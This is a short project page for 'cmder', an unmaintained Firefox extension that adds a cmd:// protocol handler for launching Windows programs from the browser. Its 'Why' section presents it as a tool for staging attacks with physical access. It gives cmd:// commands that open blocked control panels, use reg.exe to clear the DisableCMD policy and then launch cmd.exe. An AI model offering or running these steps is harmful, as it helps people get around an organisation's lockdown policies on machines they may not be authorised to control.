Firefox:: cmder
News
- 0.11 (03/14/2006): Initial release.
- 0.12 (03/18/2006): Added icon.
- (25/01/2008): cmder is no longer maintained
About
cmder is a very simple Firefox extension that adds a new protocol handler (cmd://) to the browser. It is targeted to the win32 platform.
Usage
After installing cmder you can use urls of the following syntax within Firefox:
cmd://<path to executable>[;<option 1>][;<option 2>]…
For example the following would execute the Group Policy MMC module:
cmd://c:\windows\system32\mmc.exe;c:\windows\system32\gpedit.msc
How
cmder uses the nsIProcess XPCOM to run the executable along with command line options.
Why
This is a very versatile 6kB tool for staging attacks when physical access is an option. Consider the following examples:
Access the System Properties control panel module that may be otherwise unavailable:
cmd://c:\windows\system32\control.exe;sysdm.cpl
Enable execution of cmd.exe:
cmd://c:\windows\system32\reg.exe;
ADD;HKCU\Software\Policies\Microsoft\Windows\System;
/v;DisableCMD;/t;REG_DWORD;/f;/d;0
And then execute it:
cmd://c:\windows\system32\cmd.exe